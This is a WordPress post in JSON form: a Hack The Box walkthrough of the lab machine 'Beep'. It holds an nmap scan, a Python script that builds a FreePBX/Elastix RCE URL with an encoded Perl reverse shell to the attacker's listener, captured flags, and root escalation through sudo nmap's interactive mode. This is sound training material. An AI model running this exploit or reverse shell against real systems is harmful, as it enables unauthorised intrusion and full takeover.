{"id":1657,"date":"2021-11-20T14:32:21","date_gmt":"2021-11-20T14:32:21","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1657"},"modified":"2021-11-20T14:32:21","modified_gmt":"2021-11-20T14:32:21","slug":"beep","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/11\/20\/beep\/","title":{"rendered":"Beep"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.com\/machines\/5\" title=\"Beep\">Beep<\/a> - HTB<\/td>\n<td>Easy<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.com\/storage\/avatars\/995f465295b99869fce21ecadea4604c.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Let's start with an nmap scan.<\/p>\n<pre><code class=\"language-sh\">\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# sleep 50; nmap -p- -A -T4 -Pn 10.10.10.7\nHost discovery disabled (-Pn). 
All addresses will be marked &#039;up&#039; and scan times will be slower.\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-11-20 04:57 EST\nStats: 0:02:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 93.75% done; ETC: 04:59 (0:00:06 remaining)\nStats: 0:05:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 87.12% done; ETC: 05:02 (0:00:07 remaining)\nStats: 0:05:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 89.39% done; ETC: 05:02 (0:00:07 remaining)\nStats: 0:05:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 90.91% done; ETC: 05:03 (0:00:08 remaining)\nStats: 0:06:05 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 93.94% done; ETC: 05:03 (0:00:06 remaining)\nStats: 0:06:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 94.70% done; ETC: 05:03 (0:00:06 remaining)\nStats: 0:06:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 97.73% done; ETC: 05:03 (0:00:03 remaining)\nStats: 0:06:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 97.73% done; ETC: 05:03 (0:00:03 remaining)\nNmap scan report for 10.10.10.7 (10.10.10.7)\nHost is up (0.093s latency).\nNot shown: 65519 closed ports\nPORT      STATE SERVICE    VERSION\n22\/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)\n| ssh-hostkey: \n|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)\n|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)\n25\/tcp    open  smtp       Postfix smtpd\n|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, \n80\/tcp    open  http       Apache httpd 2.2.3\n|_http-server-header: Apache\/2.2.3 (CentOS)\n|_http-title: Did not follow redirect to https:\/\/10.10.10.7\/\n110\/tcp   open  pop3       Cyrus pop3d 
2.3.7-Invoca-RPM-2.3.7-7.el5_6.4\n|_pop3-capabilities: UIDL RESP-CODES USER EXPIRE(NEVER) TOP LOGIN-DELAY(0) PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) APOP AUTH-RESP-CODE STLS\n111\/tcp   open  rpcbind    2 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2            111\/tcp   rpcbind\n|   100000  2            111\/udp   rpcbind\n|   100024  1            875\/udp   status\n|_  100024  1            878\/tcp   status\n143\/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4\n|_imap-capabilities: CATENATE IDLE Completed ACL OK CHILDREN ID ATOMIC URLAUTHA0001 NO X-NETSCAPE THREAD=REFERENCES RIGHTS=kxte LIST-SUBSCRIBED LISTEXT CONDSTORE UNSELECT RENAME MAILBOX-REFERRALS ANNOTATEMORE IMAP4 MULTIAPPEND QUOTA NAMESPACE THREAD=ORDEREDSUBJECT BINARY SORT=MODSEQ SORT IMAP4rev1 STARTTLS LITERAL+ UIDPLUS\n443\/tcp   open  ssl\/https?\n| ssl-cert: Subject: commonName=localhost.localdomain\/organizationName=SomeOrganization\/stateOrProvinceName=SomeState\/countryName=--\n| Not valid before: 2017-04-07T08:22:08\n|_Not valid after:  2018-04-07T08:22:08\n|_ssl-date: 2021-11-20T11:01:40+00:00; +59m59s from scanner time.\n878\/tcp   open  status     1 (RPC #100024)\n993\/tcp   open  ssl\/imap   Cyrus imapd\n|_imap-capabilities: CAPABILITY\n995\/tcp   open  pop3       Cyrus pop3d\n3306\/tcp  open  mysql      MySQL (unauthorized)\n|_ssl-cert: ERROR: Script execution failed (use -d to debug)\n|_ssl-date: ERROR: Script execution failed (use -d to debug)\n|_sslv2: ERROR: Script execution failed (use -d to debug)\n|_tls-alpn: ERROR: Script execution failed (use -d to debug)\n|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)\n4190\/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w\/cyrus imap)\n4445\/tcp  open  upnotifyp?\n4559\/tcp  open  hylafax    HylaFAX 4.3.10\n5038\/tcp  open  asterisk   Asterisk Call Manager 1.1\n10000\/tcp open  http       MiniServ 1.570 (Webmin 
httpd)\n|_http-title: Site doesn&#039;t have a title (text\/html; Charset=iso-8859-1).\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=11\/20%OT=22%CT=1%CU=38827%PV=Y%DS=2%DC=T%G=Y%TM=6198C8\nOS:3F%P=x86_64-pc-linux-gnu)SEQ(SP=C6%GCD=1%ISR=CC%TI=Z%CI=Z%II=I%TS=A)OPS(\nOS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11\nOS:NW7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(\nOS:R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS\nOS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0\nOS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z\nOS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y\nOS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI\nOS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 2 hops\nService Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix\n\nHost script results:\n|_clock-skew: 59m58s\n\nTRACEROUTE (using port 554\/tcp)\nHOP RTT      ADDRESS\n1   68.64 ms 10.10.14.1 (10.10.14.1)\n2   68.77 ms 10.10.10.7 (10.10.10.7)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 463.84 seconds<\/code><\/pre>\n<p>There were really a lot of open ports, and that annoyed me. I started with port 80 and researched the version information I had collected. At <strong><a href=\"https:\/\/10.10.10.7\/admin\/config.php\">https:\/\/10.10.10.7\/admin\/config.php<\/a><\/strong> I found <strong>FreePBX 2.8.1.4 on 10.10.10.7<\/strong> and started searching for that. There was an exploit at <strong><a href=\"https:\/\/raw.githubusercontent.com\/infosecjunky\/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution\/master\/exploit.py\">https:\/\/raw.githubusercontent.com\/infosecjunky\/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution\/master\/exploit.py<\/a><\/strong>, but I could not get it to run. I ran into an SSL error and did not bother fixing it. I decided to port it to python3 myself. In doing so I took the easy route and had it simply return the URL to me directly.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.7\/exp]\n\u2514\u2500# cat test.py \nimport requests\n\nrhost=&quot;10.10.10.7&quot;\nlhost=&quot;10.10.14.6&quot;\nlport=4444\nextension=&quot;233&quot;\n\nurl = &#039;https:\/\/&#039;+str(rhost)+&#039;\/recordings\/misc\/callme_page.php?action=c&amp;callmenum=&#039;+str(extension)+&#039;@from-internal\/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22&#039;+str(lhost)+&#039;%3a&#039;+str(lport)+&#039;%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A&#039;\n\nprint(url)\n#requests.get(url, verify=False)<\/code><\/pre>\n<p>Now let's run it.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.7\/exp]\n\u2514\u2500# python3 test.py 
\nhttps:\/\/10.10.10.7\/recordings\/misc\/callme_page.php?action=c&amp;callmenum=233@from-internal\/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.6%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A<\/code><\/pre>\n<p>I copied the address and opened it in the browser.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nc -lvp 4444                                                                          1 \u2a2f\nlistening on [any] 4444 ...\nconnect to [10.10.14.6] from beep.localdomain [10.10.10.7] 60262\nid\nuid=100(asterisk) gid=101(asterisk)\nwhich python\n\/usr\/bin\/python\npython -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nbash-3.2$ pwd\npwd\n\/tmp\nbash-3.2$ cd \/home\ncd \/home\nbash-3.2$ alias ls=&quot;ls -al&quot;\nalias ls=&quot;ls -al&quot;\nbash-3.2$ ls\nls\ntotal 28\ndrwxr-xr-x  4 root       root       4096 Apr  7  2017 .\ndrwxr-xr-x 22 root       root       4096 Nov 20 12:55 ..\ndrwxrwxr-x  2 fanis      fanis      4096 Apr  7  2017 fanis\ndrwx------  2 spamfilter spamfilter 4096 Apr  7  2017 spamfilter\nbash-3.2$ cd fanis\ncd fanis\nbash-3.2$ ls\nls\ntotal 32\ndrwxrwxr-x 2 fanis fanis 4096 Apr  7  2017 .\ndrwxr-xr-x 4 root  root  4096 Apr  7  2017 ..\n-rw------- 1 fanis fanis  114 Apr  7  2017 .bash_history\n-rw-r--r-- 1 fanis fanis   33 Apr  7  2017 .bash_logout\n-rw-r--r-- 1 fanis fanis  176 Apr  7  2017 .bash_profile\n-rw-r--r-- 1 fanis fanis  124 Apr  7  2017 .bashrc\n-rw-rw-r-- 1 fanis fanis   33 Nov 20 12:55 user.txt\nbash-3.2$ cat user.txt\ncat user.txt\nc923eee6a96abd8008a69532fcd6840d\n<\/code><\/pre>\n<p>Becoming root was easy too.<\/p>\n<pre><code class=\"language-sh\">\nbash-3.2$ sudo -l\nsudo -l\nMatching Defaults entries for asterisk on this host:\n    env_reset, env_keep=&quot;COLORS 
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR\n    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE\n    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC\n    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET\n    XAUTHORITY&quot;\n\nUser asterisk may run the following commands on this host:\n    (root) NOPASSWD: \/sbin\/shutdown\n    (root) NOPASSWD: \/usr\/bin\/nmap\n    (root) NOPASSWD: \/usr\/bin\/yum\n    (root) NOPASSWD: \/bin\/touch\n    (root) NOPASSWD: \/bin\/chmod\n    (root) NOPASSWD: \/bin\/chown\n    (root) NOPASSWD: \/sbin\/service\n    (root) NOPASSWD: \/sbin\/init\n    (root) NOPASSWD: \/usr\/sbin\/postmap\n    (root) NOPASSWD: \/usr\/sbin\/postfix\n    (root) NOPASSWD: \/usr\/sbin\/saslpasswd2\n    (root) NOPASSWD: \/usr\/sbin\/hardware_detector\n    (root) NOPASSWD: \/sbin\/chkconfig\n    (root) NOPASSWD: \/usr\/sbin\/elastix-helper\nbash-3.2$ \n\nbash-3.2$ \n\nbash-3.2$ sudo -u root \/usr\/bin\/nmap --interactive\nsudo -u root \/usr\/bin\/nmap --interactive\n\nStarting Nmap V. 4.11 ( http:\/\/www.insecure.org\/nmap\/ )\nWelcome to Interactive Mode -- press h &lt;enter&gt; for help\nnmap&gt; !sh\n!sh\nsh-3.2# id\nid\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\nsh-3.2# cd \/root\ncd \/root\nsh-3.2# ls\nls\nanaconda-ks.cfg            install.log.syslog  webmin-1.570-1.noarch.rpm\nelastix-pr-2.2-1.i386.rpm  postnochroot\ninstall.log                root.txt\nsh-3.2# cat root.txt\ncat root.txt\n97b794de414bb98f984d69a8998c4287<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Difficulty OS Logo Beep &#8211; HTB Easy Linux Walkthrough Let's start with an nmap scan. 
\u2500\u2500(root&#x1f480;kali)-[~] \u2514\u2500# sleep 50; nmap -p- -A -T4 -Pn 10.10.10.7&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/11\/20\/beep\/\">Read more<span class=\"screen-reader-text\">Beep<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1657","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1657","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1657"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1657\/revisions"}],"predecessor-version":[{"id":1658,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1657\/revisions\/1658"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1657"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1657"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1657"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}